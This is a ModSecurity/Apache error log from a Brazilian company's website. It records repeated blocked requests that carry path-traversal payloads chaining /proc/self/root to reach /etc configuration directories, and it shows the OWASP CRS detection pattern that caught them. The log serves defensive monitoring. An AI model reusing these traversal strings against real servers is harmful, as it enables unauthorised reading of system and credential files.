[Fri Mar 20 08:27:50.115174 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.243.128:40810] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0vNNa6ubjKNq_cu4bZ6QAAA0Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:27:52.667562 2026] [:error] [pid 7893:tid 140411557287680] [client 74.7.243.128:52640] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0vOBCii7xarUs8iHZsHQAAAhY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:27:53.218377 2026] [:error] [pid 7893:tid 140411691570944] [client 74.7.243.128:52640] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0vORCii7xarUs8iHZsHgAAAgY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:27:54.569581 2026] [:error] [pid 10189:tid 140411624429312] [client 74.7.243.128:52650] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0vOjJ3M9BSuKP7CAYiGAAAAI4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:27:55.904129 2026] [:error] [pid 7893:tid 140411599251200] [client 74.7.243.128:52666] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0vOxCii7xarUs8iHZsIAAAAhE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:27:58.630258 2026] [:error] [pid 7893:tid 140411674785536] [client 74.7.243.128:52682] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0vPRCii7xarUs8iHZsIwAAAgg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:28:01.279221 2026] [:error] [pid 11167:tid 140411548894976] [client 74.7.243.128:50370] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0vQfHIg5MgXLBnicP8hgAAAdc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:28:07.090161 2026] [:error] [pid 10189:tid 140411733534464] [client 74.7.243.128:50386] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0vRzJ3M9BSuKP7CAYiKQAAAIE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:28:10.556400 2026] [:error] [pid 9818:tid 140411741927168] [client 74.7.243.128:50400] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0vSl1pVZ5mVmJwsFM2IQAAAEA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:28:11.898398 2026] [:error] [pid 15826:tid 140411557287680] [client 74.7.243.128:48150] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0vS-oXxyEfFpUF8f-FnwAAAVY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:28:14.256936 2026] [:error] [pid 31215:tid 140411616036608] [client 74.7.243.128:48154] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0vTgF0L0L-SsrnPo5tvwAAAs8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:28:15.584548 2026] [:error] [pid 15826:tid 140411599251200] [client 74.7.243.128:48166] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0vT-oXxyEfFpUF8f-FogAAAVE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:28:18.114068 2026] [:error] [pid 21219:tid 140411691570944] [client 74.7.243.128:48178] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0vUvXLqtnMIWvjpaKfqQAAAoY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:28:20.669223 2026] [:error] [pid 10189:tid 140411599251200] [client 74.7.243.128:52820] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0vVDJ3M9BSuKP7CAYiOgAAAJE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:28:21.994985 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.243.128:52834] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0vVda6ubjKNq_cu4baBgAAA0c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:28:24.408123 2026] [:error] [pid 11642:tid 140411557287680] [client 74.7.243.128:52840] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0vWLninkcc-iUj5ApjIgAAA5Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:28:27.804539 2026] [:error] [pid 7893:tid 140411624429312] [client 74.7.243.128:52850] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0vWxCii7xarUs8iHZsMgAAAg4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:28:28.041155 2026] [:error] [pid 7893:tid 140411741927168] [client 74.7.228.61:34048] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab0vXBCii7xarUs8iHZsMwAAAgA"]
[Fri Mar 20 08:28:29.098649 2026] [:error] [pid 15826:tid 140411641214720] [client 74.7.243.128:52858] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0vXeoXxyEfFpUF8f-FpgAAAUw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:28:32.964886 2026] [:error] [pid 7235:tid 140411708356352] [client 74.7.243.128:44444] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0vYPqxLDW4GITHUkTt9wAAAQQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:28:35.302589 2026] [:error] [pid 31215:tid 140411582465792] [client 74.7.243.128:44454] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0vYwF0L0L-SsrnPo5tygAAAtM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:28:36.682962 2026] [:error] [pid 10189:tid 140411574073088] [client 74.7.243.128:44458] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0vZDJ3M9BSuKP7CAYiUgAAAJQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
